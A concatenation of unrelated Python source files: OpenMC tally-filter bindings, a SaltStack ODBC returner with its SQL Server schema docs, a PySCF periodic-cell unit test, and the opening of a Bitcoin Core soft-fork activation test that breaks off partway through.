def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
energies = POINTER(c_double)()
n = c_size_t()
_dll.openmc_energy_filter_get_bins(self._index, energies, n)
return as_array(energies, (n.value,))
@bins.setter
def bins(self, bins):
# Get numpy array as a double*
energies = np.asarray(bins)
energies_p = energies.ctypes.data_as(POINTER(c_double))
_dll.openmc_energy_filter_set_bins(
self._index, len(energies), energies_p)
class EnergyoutFilter(EnergyFilter):
filter_type = 'energyout'
class AzimuthalFilter(Filter):
filter_type = 'azimuthal'
class CellFilter(Filter):
filter_type = 'cell'
@property
def bins(self):
cells = POINTER(c_int32)()
n = c_int32()
_dll.openmc_cell_filter_get_bins(self._index, cells, n)
return as_array(cells, (n.value,))
class CellbornFilter(Filter):
filter_type = 'cellborn'
class CellfromFilter(Filter):
filter_type = 'cellfrom'
class CellInstanceFilter(Filter):
filter_type = 'cellinstance'
class DelayedGroupFilter(Filter):
filter_type = 'delayedgroup'
class DistribcellFilter(Filter):
filter_type = 'distribcell'
class EnergyFunctionFilter(Filter):
filter_type = 'energyfunction'
def __new__(cls, energy=None, y=None, uid=None, new=True, index=None):
return super().__new__(cls, uid=uid, new=new, index=index)
def __init__(self, energy=None, y=None, uid=None, new=True, index=None):
if (energy is None) != (y is None):
raise AttributeError("Need both energy and y or neither")
super().__init__(uid, new, index)
if energy is not None:
self.set_data(energy, y)
def set_data(self, energy, y):
"""Set the interpolation information for the filter
Parameters
----------
energy : numpy.ndarray
Independent variable for the interpolation
y : numpy.ndarray
Dependent variable for the interpolation
"""
energy_array = np.asarray(energy)
y_array = np.asarray(y)
energy_p = energy_array.ctypes.data_as(POINTER(c_double))
y_p = y_array.ctypes.data_as(POINTER(c_double))
_dll.openmc_energyfunc_filter_set_data(
self._index, len(energy_array), energy_p, y_p)
@property
def energy(self):
return self._get_attr(_dll.openmc_energyfunc_filter_get_energy)
@property
def y(self):
return self._get_attr(_dll.openmc_energyfunc_filter_get_y)
def _get_attr(self, cfunc):
array_p = POINTER(c_double)()
n = c_size_t()
cfunc(self._index, n, array_p)
return as_array(array_p, (n.value, ))
class LegendreFilter(Filter):
filter_type = 'legendre'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_legendre_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_legendre_filter_set_order(self._index, order)
class MaterialFilter(Filter):
filter_type = 'material'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
materials = POINTER(c_int32)()
n = c_size_t()
_dll.openmc_material_filter_get_bins(self._index, materials, n)
return [Material(index=materials[i]) for i in range(n.value)]
@bins.setter
def bins(self, materials):
# Get material indices as int32_t[]
n = len(materials)
bins = (c_int32*n)(*(m._index for m in materials))
_dll.openmc_material_filter_set_bins(self._index, n, bins)
class MeshFilter(Filter):
filter_type = 'mesh'
def __init__(self, mesh=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if mesh is not None:
self.mesh = mesh
@property
def mesh(self):
index_mesh = c_int32()
_dll.openmc_mesh_filter_get_mesh(self._index, index_mesh)
return RegularMesh(index=index_mesh.value)
@mesh.setter
def mesh(self, mesh):
_dll.openmc_mesh_filter_set_mesh(self._index, mesh._index)
class MeshSurfaceFilter(Filter):
filter_type = 'meshsurface'
def __init__(self, mesh=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if mesh is not None:
self.mesh = mesh
@property
def mesh(self):
index_mesh = c_int32()
_dll.openmc_meshsurface_filter_get_mesh(self._index, index_mesh)
return RegularMesh(index=index_mesh.value)
@mesh.setter
def mesh(self, mesh):
_dll.openmc_meshsurface_filter_set_mesh(self._index, mesh._index)
class MuFilter(Filter):
filter_type = 'mu'
class ParticleFilter(Filter):
filter_type = 'particle'
class PolarFilter(Filter):
filter_type = 'polar'
class SphericalHarmonicsFilter(Filter):
filter_type = 'sphericalharmonics'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_sphharm_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_sphharm_filter_set_order(self._index, order)
class SpatialLegendreFilter(Filter):
filter_type = 'spatiallegendre'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_spatial_legendre_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_spatial_legendre_filter_set_order(self._index, order)
class SurfaceFilter(Filter):
filter_type = 'surface'
class UniverseFilter(Filter):
filter_type = 'universe'
class ZernikeFilter(Filter):
filter_type = 'zernike'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_zernike_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_zernike_filter_set_order(self._index, order)
class ZernikeRadialFilter(ZernikeFilter):
filter_type = 'zernikeradial'
_FILTER_TYPE_MAP = {
'azimuthal': AzimuthalFilter,
'cell': CellFilter,
'cellborn': CellbornFilter,
'cellfrom': CellfromFilter,
'cellinstance': CellInstanceFilter,
'delayedgroup': DelayedGroupFilter,
'distribcell': DistribcellFilter,
'energy': EnergyFilter,
'energyout': EnergyoutFilter,
'energyfunction': EnergyFunctionFilter,
'legendre': LegendreFilter,
'material': MaterialFilter,
'mesh': MeshFilter,
'meshsurface': MeshSurfaceFilter,
'mu': MuFilter,
'particle': ParticleFilter,
'polar': PolarFilter,
'sphericalharmonics': SphericalHarmonicsFilter,
'spatiallegendre': SpatialLegendreFilter,
'surface': SurfaceFilter,
'universe': UniverseFilter,
'zernike': ZernikeFilter,
'zernikeradial': ZernikeRadialFilter
}
def _get_filter(index):
filter_type = create_string_buffer(20)
_dll.openmc_filter_get_type(index, filter_type)
filter_type = filter_type.value.decode()
return _FILTER_TYPE_MAP[filter_type](index=index)
class _FilterMapping(Mapping):
def __getitem__(self, key):
index = c_int32()
try:
_dll.openmc_get_filter_index(key, index)
except (AllocationError, InvalidIDError) as e:
# __contains__ expects a KeyError to work correctly
raise KeyError(str(e))
return _get_filter(index.value)
def __iter__(self):
for i in range(len(self)):
yield _get_filter(i).id
def __len__(self):
return _dll.tally_filters_size()
def __repr__(self):
return repr(dict(self))
filters = _FilterMapping()
|
|
"""
Return data to an ODBC compliant server. This driver was
developed with Microsoft SQL Server in mind, but theoretically
could be used to return data to any compliant ODBC database
as long as there is a working ODBC driver for it on your
minion platform.
:maintainer: C. R. Oldham ([email protected])
:maturity: New
:depends: unixodbc, pyodbc, freetds (for SQL Server)
:platform: all
To enable this returner the minion will need
On Linux:
unixodbc (http://www.unixodbc.org)
pyodbc (`pip install pyodbc`)
The FreeTDS ODBC driver for SQL Server (http://www.freetds.org)
or another compatible ODBC driver
On Windows:
TBD
unixODBC and FreeTDS need to be configured via /etc/odbcinst.ini and
/etc/odbc.ini.
/etc/odbcinst.ini::
[TDS]
Description=TDS
Driver=/usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so
(Note the above Driver line needs to point to the location of the FreeTDS
shared library. This example is for Ubuntu 14.04.)
/etc/odbc.ini::
[TS]
Description = "Salt Returner"
Driver=TDS
Server = <your server ip or fqdn>
Port = 1433
Database = salt
Trace = No
Also you need the following values configured in the minion or master config.
Configure as you see fit::
returner.odbc.dsn: 'TS'
returner.odbc.user: 'salt'
returner.odbc.passwd: 'salt'
Alternative configuration values can be used by prefacing the configuration.
Any values not found in the alternative configuration will be pulled from
the default location::
alternative.returner.odbc.dsn: 'TS'
alternative.returner.odbc.user: 'salt'
alternative.returner.odbc.passwd: 'salt'
Running the following commands against Microsoft SQL Server in the desired
database as the appropriate user should create the database tables
correctly. Replace with equivalent SQL for other ODBC-compliant servers
.. code-block:: sql
--
-- Table structure for table 'jids'
--
if OBJECT_ID('dbo.jids', 'U') is not null
DROP TABLE dbo.jids
CREATE TABLE dbo.jids (
jid varchar(255) PRIMARY KEY,
load varchar(MAX) NOT NULL
);
--
-- Table structure for table 'salt_returns'
--
IF OBJECT_ID('dbo.salt_returns', 'U') IS NOT NULL
DROP TABLE dbo.salt_returns;
CREATE TABLE dbo.salt_returns (
added datetime not null default (getdate()),
fun varchar(100) NOT NULL,
jid varchar(255) NOT NULL,
retval varchar(MAX) NOT NULL,
id varchar(255) NOT NULL,
success bit default(0) NOT NULL,
full_ret varchar(MAX)
);
CREATE INDEX salt_returns_added on dbo.salt_returns(added);
CREATE INDEX salt_returns_id on dbo.salt_returns(id);
CREATE INDEX salt_returns_jid on dbo.salt_returns(jid);
CREATE INDEX salt_returns_fun on dbo.salt_returns(fun);
To use this returner, append '--return odbc' to the salt command.
.. code-block:: bash
salt '*' status.diskusage --return odbc
To use the alternative configuration, append '--return_config alternative' to the salt command.
.. versionadded:: 2015.5.0
.. code-block:: bash
salt '*' test.ping --return odbc --return_config alternative
To override individual configuration items, append --return_kwargs '{"key:": "value"}' to the salt command.
.. versionadded:: 2016.3.0
.. code-block:: bash
salt '*' test.ping --return odbc --return_kwargs '{"dsn": "dsn-name"}'
"""
import salt.returners
import salt.utils.jid
import salt.utils.json
# FIXME We'll need to handle this differently for Windows.
try:
import pyodbc
# import psycopg2.extras
HAS_ODBC = True
except ImportError:
HAS_ODBC = False
# Define the module's virtual name
__virtualname__ = "odbc"
def __virtual__():
if not HAS_ODBC:
return False, "Could not import odbc returner; pyodbc is not installed."
return True
def _get_options(ret=None):
"""
Get the odbc options from salt.
"""
attrs = {"dsn": "dsn", "user": "user", "passwd": "passwd"}
_options = salt.returners.get_returner_options(
"returner.{}".format(__virtualname__),
ret,
attrs,
__salt__=__salt__,
__opts__=__opts__,
)
return _options
def _get_conn(ret=None):
"""
Return a MSSQL connection.
"""
_options = _get_options(ret)
dsn = _options.get("dsn")
user = _options.get("user")
passwd = _options.get("passwd")
return pyodbc.connect("DSN={};UID={};PWD={}".format(dsn, user, passwd))
def _close_conn(conn):
"""
Close the MySQL connection
"""
conn.commit()
conn.close()
def returner(ret):
"""
Return data to an odbc server
"""
conn = _get_conn(ret)
cur = conn.cursor()
sql = """INSERT INTO salt_returns
(fun, jid, retval, id, success, full_ret)
VALUES (?, ?, ?, ?, ?, ?)"""
cur.execute(
sql,
(
ret["fun"],
ret["jid"],
salt.utils.json.dumps(ret["return"]),
ret["id"],
ret["success"],
salt.utils.json.dumps(ret),
),
)
_close_conn(conn)
def save_load(jid, load, minions=None):
"""
Save the load to the specified jid id
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """INSERT INTO jids (jid, load) VALUES (?, ?)"""
cur.execute(sql, (jid, salt.utils.json.dumps(load)))
_close_conn(conn)
def save_minions(jid, minions, syndic_id=None): # pylint: disable=unused-argument
"""
Included for API consistency
"""
def get_load(jid):
"""
Return the load data that marks a specified jid
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT load FROM jids WHERE jid = ?;"""
cur.execute(sql, (jid,))
data = cur.fetchone()
if data:
return salt.utils.json.loads(data)
_close_conn(conn)
return {}
def get_jid(jid):
"""
Return the information returned when the specified job id was executed
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT id, full_ret FROM salt_returns WHERE jid = ?"""
cur.execute(sql, (jid,))
data = cur.fetchall()
ret = {}
if data:
for minion, full_ret in data:
ret[minion] = salt.utils.json.loads(full_ret)
_close_conn(conn)
return ret
def get_fun(fun):
"""
Return a dict of the last function called for all minions
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT s.id,s.jid, s.full_ret
FROM salt_returns s
JOIN ( SELECT MAX(jid) AS jid FROM salt_returns GROUP BY fun, id) max
ON s.jid = max.jid
WHERE s.fun = ?
"""
cur.execute(sql, (fun,))
data = cur.fetchall()
ret = {}
if data:
for minion, _, retval in data:
ret[minion] = salt.utils.json.loads(retval)
_close_conn(conn)
return ret
def get_jids():
"""
Return a list of all job ids
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT distinct jid, load FROM jids"""
cur.execute(sql)
data = cur.fetchall()
ret = {}
for jid, load in data:
ret[jid] = salt.utils.jid.format_jid_instance(jid, salt.utils.json.loads(load))
_close_conn(conn)
return ret
def get_minions():
"""
Return a list of minions
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT DISTINCT id FROM salt_returns"""
cur.execute(sql)
data = cur.fetchall()
ret = []
for minion in data:
ret.append(minion[0])
_close_conn(conn)
return ret
def prep_jid(nocache=False, passed_jid=None): # pylint: disable=unused-argument
"""
Do any work necessary to prepare a JID, including sending a custom id
"""
return passed_jid if passed_jid is not None else salt.utils.jid.gen_jid(__opts__)
|
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <[email protected]>
#
import unittest
import ctypes
import numpy
import numpy as np
from pyscf.pbc import gto as pgto
L = 1.5
n = 41
cl = pgto.Cell()
cl.build(
a = [[L,0,0], [0,L,0], [0,0,L]],
mesh = [n,n,n],
atom = 'He %f %f %f' % ((L/2.,)*3),
basis = 'ccpvdz')
numpy.random.seed(1)
cl1 = pgto.Cell()
cl1.build(a = numpy.random.random((3,3)).T,
precision = 1e-9,
mesh = [n,n,n],
atom ='''He .1 .0 .0
He .5 .1 .0
He .0 .5 .0
He .1 .3 .2''',
basis = 'ccpvdz')
def finger(a):
w = numpy.cos(numpy.arange(a.size))
return numpy.dot(a.ravel(), w)
class KnownValues(unittest.TestCase):
def test_nimgs(self):
self.assertTrue(list(cl.get_nimgs(9e-1)), [1,1,1])
self.assertTrue(list(cl.get_nimgs(1e-2)), [2,2,2])
self.assertTrue(list(cl.get_nimgs(1e-4)), [3,3,3])
self.assertTrue(list(cl.get_nimgs(1e-6)), [4,4,4])
self.assertTrue(list(cl.get_nimgs(1e-9)), [5,5,5])
def test_Gv(self):
a = cl1.get_Gv()
self.assertAlmostEqual(finger(a), -99.791927068519939, 10)
def test_SI(self):
a = cl1.get_SI()
self.assertAlmostEqual(finger(a), (16.506917823339265+1.6393578329869585j), 10)
np.random.seed(2)
Gv = np.random.random((5,3))
a = cl1.get_SI(Gv)
self.assertAlmostEqual(finger(a), (0.65237631847195221-1.5736011413431059j), 10)
def test_mixed_basis(self):
cl = pgto.Cell()
cl.build(
a = [[L,0,0], [0,L,0], [0,0,L]],
mesh = [n,n,n],
atom = 'C1 %f %f %f; C2 %f %f %f' % ((L/2.,)*6),
basis = {'C1':'ccpvdz', 'C2':'gthdzv'})
def test_dumps_loads(self):
cl1.loads(cl1.dumps())
def test_get_lattice_Ls(self):
#self.assertEqual(cl1.get_lattice_Ls([0,0,0]).shape, (1 , 3))
#self.assertEqual(cl1.get_lattice_Ls([1,1,1]).shape, (13 , 3))
#self.assertEqual(cl1.get_lattice_Ls([2,2,2]).shape, (57 , 3))
#self.assertEqual(cl1.get_lattice_Ls([3,3,3]).shape, (137, 3))
#self.assertEqual(cl1.get_lattice_Ls([4,4,4]).shape, (281, 3))
#self.assertEqual(cl1.get_lattice_Ls([5,5,5]).shape, (493, 3))
cell = pgto.M(atom = '''
C 0.000000000000 0.000000000000 0.000000000000
C 1.685068664391 1.685068664391 1.685068664391''',
unit='B',
basis = 'gth-dzvp',
pseudo = 'gth-pade',
a = '''
0.000000000 3.370137329 3.370137329
3.370137329 0.000000000 3.370137329
3.370137329 3.370137329 0.000000000''',
mesh = [15]*3)
rcut = max([cell.bas_rcut(ib, 1e-8) for ib in range(cell.nbas)])
self.assertEqual(cell.get_lattice_Ls(rcut=rcut).shape, (1097, 3))
rcut = max([cell.bas_rcut(ib, 1e-9) for ib in range(cell.nbas)])
self.assertEqual(cell.get_lattice_Ls(rcut=rcut).shape, (1241, 3))
def test_ewald(self):
cell = pgto.Cell()
cell.unit = 'B'
Lx = Ly = Lz = 5.
cell.a = numpy.diag([Lx,Ly,Lz])
cell.mesh = numpy.array([41]*3)
cell.atom = [['He', (2, 0.5*Ly, 0.5*Lz)],
['He', (3, 0.5*Ly, 0.5*Lz)]]
cell.basis = {'He': [[0, (1.0, 1.0)]]}
cell.verbose = 5
cell.output = '/dev/null'
cell.build()
ew_cut = (20,20,20)
self.assertAlmostEqual(cell.ewald(.05, 100), -0.468640671931, 9)
self.assertAlmostEqual(cell.ewald(0.1, 100), -0.468640671931, 9)
self.assertAlmostEqual(cell.ewald(0.2, 100), -0.468640671931, 9)
self.assertAlmostEqual(cell.ewald(1 , 100), -0.468640671931, 9)
def check(precision, eta_ref, ewald_ref):
ew_eta0, ew_cut0 = cell.get_ewald_params(precision, mesh=[41]*3)
self.assertAlmostEqual(ew_eta0, eta_ref)
self.assertAlmostEqual(cell.ewald(ew_eta0, ew_cut0), ewald_ref, 9)
check(0.001, 3.15273336976, -0.468640679947)
check(1e-05, 2.77596886114, -0.468640671968)
check(1e-07, 2.50838938833, -0.468640671931)
check(1e-09, 2.30575091612, -0.468640671931)
cell = pgto.Cell()
numpy.random.seed(10)
cell.a = numpy.random.random((3,3))*2 + numpy.eye(3) * 2
cell.mesh = [41]*3
cell.atom = [['He', (1, 1, 2)],
['He', (3, 2, 1)]]
cell.basis = {'He': [[0, (1.0, 1.0)]]}
cell.verbose = 5
cell.output = '/dev/null'
cell.build()
self.assertAlmostEqual(cell.ewald(1, 20), -2.3711356723457615, 9)
self.assertAlmostEqual(cell.ewald(2, 10), -2.3711356723457615, 9)
self.assertAlmostEqual(cell.ewald(2, 5), -2.3711356723457615, 9)
def test_ewald_2d_inf_vacuum(self):
cell = pgto.Cell()
cell.a = numpy.eye(3) * 4
cell.atom = 'He 0 0 0; He 0 1 1'
cell.unit = 'B'
cell.mesh = [9,9,60]
cell.verbose = 0
cell.dimension = 2
cell.low_dim_ft_type = 'inf_vacuum'
cell.rcut = 3.6
cell.build()
self.assertAlmostEqual(cell.ewald(), 3898143.7149599474, 4)
a = numpy.eye(3) * 3
a[0,1] = .2
c = pgto.M(atom='H 0 0.1 0; H 1.1 2.0 0; He 1.2 .3 0.2',
a=a, dimension=2, verbose=0)
self.assertAlmostEqual(c.ewald(), -3.0902098018260418, 9)
def test_ewald_1d_inf_vacuum(self):
cell = pgto.Cell()
cell.a = numpy.eye(3) * 4
cell.atom = 'He 0 0 0; He 0 1 1'
cell.unit = 'B'
cell.mesh = [9,60,60]
cell.verbose = 0
cell.dimension = 1
cell.low_dim_ft_type = 'inf_vacuum'
cell.rcut = 3.6
cell.build()
self.assertAlmostEqual(cell.ewald(), 70.875156940393225, 8)
def test_ewald_0d_inf_vacuum(self):
cell = pgto.Cell()
cell.a = numpy.eye(3)
cell.atom = 'He 0 0 0; He 0 1 1'
cell.unit = 'B'
cell.mesh = [60] * 3
cell.verbose = 0
cell.dimension = 0
cell.low_dim_ft_type = 'inf_vacuum'
cell.build()
eref = cell.to_mol().energy_nuc()
self.assertAlmostEqual(cell.ewald(), eref, 2)
def test_ewald_2d(self):
cell = pgto.Cell()
cell.a = numpy.eye(3) * 4
cell.atom = 'He 0 0 0; He 0 1 1'
cell.unit = 'B'
cell.mesh = [9,9,60]
cell.verbose = 0
cell.dimension = 2
cell.rcut = 3.6
cell.build()
self.assertAlmostEqual(cell.ewald(), -5.1194779101355596, 9)
# def test_ewald_1d(self):
# cell = pgto.Cell()
# cell.a = numpy.eye(3) * 4
# cell.atom = 'He 0 0 0; He 0 1 1'
# cell.unit = 'B'
# cell.mesh = [9,60,60]
# cell.verbose = 0
# cell.dimension = 1
# cell.rcut = 3.6
# cell.build()
# self.assertAlmostEqual(cell.ewald(), 70.875156940393225, 8)
#
# def test_ewald_0d(self):
# cell = pgto.Cell()
# cell.a = numpy.eye(3)
# cell.atom = 'He 0 0 0; He 0 1 1'
# cell.unit = 'B'
# cell.mesh = [60] * 3
# cell.verbose = 0
# cell.dimension = 0
# cell.build()
# eref = cell.to_mol().energy_nuc()
# self.assertAlmostEqual(cell.ewald(), eref, 2)
def test_pbc_intor(self):
numpy.random.seed(12)
kpts = numpy.random.random((4,3))
kpts[0] = 0
self.assertEqual(list(cl1.nimgs), [32,21,19])
s0 = cl1.pbc_intor('int1e_ovlp_sph', hermi=0, kpts=kpts)
self.assertAlmostEqual(finger(s0[0]), 492.30658304804126, 4)
self.assertAlmostEqual(finger(s0[1]), 37.812956255000756-28.972806230140314j, 4)
self.assertAlmostEqual(finger(s0[2]),-26.113285893260819-34.448501789693566j, 4)
self.assertAlmostEqual(finger(s0[3]), 186.58921213429491+123.90133823378201j, 4)
s1 = cl1.pbc_intor('int1e_ovlp_sph', hermi=1, kpts=kpts[0])
self.assertAlmostEqual(finger(s1), 492.30658304804126, 4)
def test_ecp_pseudo(self):
from pyscf.pbc.gto import ecp
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'Cu 0 0 1; Na 0 1 0',
ecp = {'Na':'lanl2dz'},
pseudo = {'Cu': 'gthbp'})
self.assertTrue(all(cell._ecpbas[:,0] == 1))
cell = pgto.Cell()
cell.a = numpy.eye(3) * 8
cell.mesh = [11] * 3
cell.atom='''Na 0. 0. 0.
H 0. 0. 1.'''
cell.basis={'Na':'lanl2dz', 'H':'sto3g'}
cell.ecp = {'Na':'lanl2dz'}
cell.build()
v1 = ecp.ecp_int(cell)
mol = cell.to_mol()
v0 = mol.intor('ECPscalar_sph')
self.assertAlmostEqual(abs(v0 - v1).sum(), 0.029005926114411891, 8)
def test_ecp_keyword_in_pseudo(self):
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'S 0 0 1',
ecp = 'lanl2dz',
pseudo = {'O': 'gthbp', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.ecp, 'lanl2dz')
self.assertEqual(cell.pseudo, {'O': 'gthbp'})
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'S 0 0 1',
ecp = {'na': 'lanl2dz'},
pseudo = {'O': 'gthbp', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.ecp, {'na': 'lanl2dz', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.pseudo, {'O': 'gthbp'})
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'S 0 0 1',
pseudo = {'O': 'gthbp', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.ecp, {'Cu': 'stuttgartrsc'})
self.assertEqual(cell.pseudo, {'O': 'gthbp'})
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'S 0 0 1',
ecp = {'S': 'gthbp', 'na': 'lanl2dz'},
pseudo = {'O': 'gthbp', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.ecp, {'na': 'lanl2dz', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.pseudo, {'S': 'gthbp', 'O': 'gthbp'})
def test_pseudo_suffix(self):
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'Mg 0 0 1',
pseudo = {'Mg': 'gth-lda'})
self.assertEqual(cell.atom_nelec_core(0), 2)
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'Mg 0 0 1',
pseudo = {'Mg': 'gth-lda q2'})
self.assertEqual(cell.atom_nelec_core(0), 10)
def pbc_intor_symmetry(self):
a = cl1.lattice_vectors()
b = numpy.linalg.inv(a).T * (numpy.pi*2)
kpts = numpy.random.random((4,3))
kpts[1] = b[0]+b[1]+b[2]-kpts[0]
kpts[2] = b[0]-b[1]-b[2]-kpts[0]
kpts[3] = b[0]-b[1]+b[2]+kpts[0]
s = cl1.pbc_intor('int1e_ovlp', kpts=kpts)
self.assertAlmostEqual(abs(s[0]-s[1].conj()).max(), 0, 12)
self.assertAlmostEqual(abs(s[0]-s[2].conj()).max(), 0, 12)
self.assertAlmostEqual(abs(s[0]-s[3] ).max(), 0, 12)
def test_basis_truncation(self):
b = pgto.basis.load('gthtzvp@3s1p', 'C')
self.assertEqual(len(b), 2)
self.assertEqual(len(b[0][1]), 4)
self.assertEqual(len(b[1][1]), 2)
def test_getattr(self):
from pyscf.pbc import scf, dft, cc, tdscf
cell = pgto.M(atom='He', a=np.eye(3)*4, basis={'He': [[0, (1, 1)]]})
self.assertEqual(cell.HF().__class__, scf.HF(cell).__class__)
self.assertEqual(cell.KS().__class__, dft.KS(cell).__class__)
self.assertEqual(cell.UKS().__class__, dft.UKS(cell).__class__)
self.assertEqual(cell.KROHF().__class__, scf.KROHF(cell).__class__)
self.assertEqual(cell.KKS().__class__, dft.KKS(cell).__class__)
self.assertEqual(cell.CCSD().__class__, cc.ccsd.RCCSD)
self.assertEqual(cell.TDA().__class__, tdscf.rhf.TDA)
self.assertEqual(cell.TDBP86().__class__, tdscf.rks.TDDFTNoHybrid)
self.assertEqual(cell.TDB3LYP().__class__, tdscf.rks.TDDFT)
self.assertEqual(cell.KCCSD().__class__, cc.kccsd_rhf.KRCCSD)
self.assertEqual(cell.KTDA().__class__, tdscf.krhf.TDA)
self.assertEqual(cell.KTDBP86().__class__, tdscf.krks.TDDFTNoHybrid)
self.assertRaises(AttributeError, lambda: cell.xyz)
self.assertRaises(AttributeError, lambda: cell.TDxyz)
if __name__ == '__main__':
print("Full Tests for pbc.gto.cell")
unittest.main()
|
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test activation of the first version bits soft fork.
This soft fork will activate the following BIPS:
BIP 68 - nSequence relative lock times
BIP 112 - CHECKSEQUENCEVERIFY
BIP 113 - MedianTimePast semantics for nLockTime
regtest lock-in with 108/144 block signalling
activation after a further 144 blocks
mine 82 blocks whose coinbases will be used to generate inputs for our tests
mine 61 blocks to transition from DEFINED to STARTED
mine 144 blocks only 100 of which are signaling readiness in order to fail to change state this period
mine 144 blocks with 108 signaling and verify STARTED->LOCKED_IN
mine 140 blocks and seed block chain with the 82 inputs will use for our tests at height 572
mine 3 blocks and verify still at LOCKED_IN and test that enforcement has not triggered
mine 1 block and test that enforcement has triggered (which triggers ACTIVE)
Test BIP 113 is enforced
Mine 4 blocks so next height is 580 and test BIP 68 is enforced for time and height
Mine 1 block so next height is 581 and test BIP 68 now passes time but not height
Mine 1 block so next height is 582 and test BIP 68 now passes time and height
Test that BIP 112 is enforced
Various transactions will be used to test that the BIPs rules are not enforced before the soft fork activates
And that after the soft fork activates transactions pass and fail as they should according to the rules.
For each BIP, transactions of versions 1 and 2 will be tested.
----------------
BIP 113:
bip113tx - modify the nLocktime variable
BIP 68:
bip68txs - 16 txs with nSequence relative locktime of 10 with various bits set as per the relative_locktimes below
BIP 112:
bip112txs_vary_nSequence - 16 txs with nSequence relative_locktimes of 10 evaluated against 10 OP_CSV OP_DROP
bip112txs_vary_nSequence_9 - 16 txs with nSequence relative_locktimes of 9 evaluated against 10 OP_CSV OP_DROP
bip112txs_vary_OP_CSV - 16 txs with nSequence = 10 evaluated against varying {relative_locktimes of 10} OP_CSV OP_DROP
bip112txs_vary_OP_CSV_9 - 16 txs with nSequence = 9 evaluated against varying {relative_locktimes of 10} OP_CSV OP_DROP
bip112tx_special - test negative argument to OP_CSV
"""
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.mininode import ToHex, CTransaction, NetworkThread
from test_framework.blocktools import create_coinbase, create_block
from test_framework.comptool import TestInstance, TestManager
from test_framework.script import *
from io import BytesIO
import time
base_relative_locktime = 10
seq_disable_flag = 1<<31
seq_random_high_bit = 1<<25
seq_type_flag = 1<<22
seq_random_low_bit = 1<<18
# b31,b25,b22,b18 represent the 31st, 25th, 22nd and 18th bits respectively in the nSequence field
# relative_locktimes[b31][b25][b22][b18] is a base_relative_locktime with the indicated bits set if their indices are 1
relative_locktimes = []
for b31 in range(2):
b25times = []
for b25 in range(2):
b22times = []
for b22 in range(2):
b18times = []
for b18 in range(2):
rlt = base_relative_locktime
if (b31):
rlt = rlt | seq_disable_flag
if (b25):
rlt = rlt | seq_random_high_bit
if (b22):
rlt = rlt | seq_type_flag
if (b18):
rlt = rlt | seq_random_low_bit
b18times.append(rlt)
b22times.append(b18times)
b25times.append(b22times)
relative_locktimes.append(b25times)
def all_rlt_txs(txarray):
txs = []
for b31 in range(2):
for b25 in range(2):
for b22 in range(2):
for b18 in range(2):
txs.append(txarray[b31][b25][b22][b18])
return txs
class BIP68_112_113Test(ComparisonTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
def setup_network(self):
# Must set the blockversion for this test
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir,
extra_args=[['-debug', '-whitelist=127.0.0.1', '-blockversion=4']],
binary=[self.options.testbinary])
def run_test(self):
test = TestManager(self, self.options.tmpdir)
test.add_all_connections(self.nodes)
NetworkThread().start() # Start up network handling in another thread
test.run()
def send_generic_input_tx(self, node, coinbases):
amount = Decimal("49.99")
return node.sendrawtransaction(ToHex(self.sign_transaction(node, self.create_transaction(node, node.getblock(coinbases.pop())['tx'][0], self.nodeaddress, amount))))
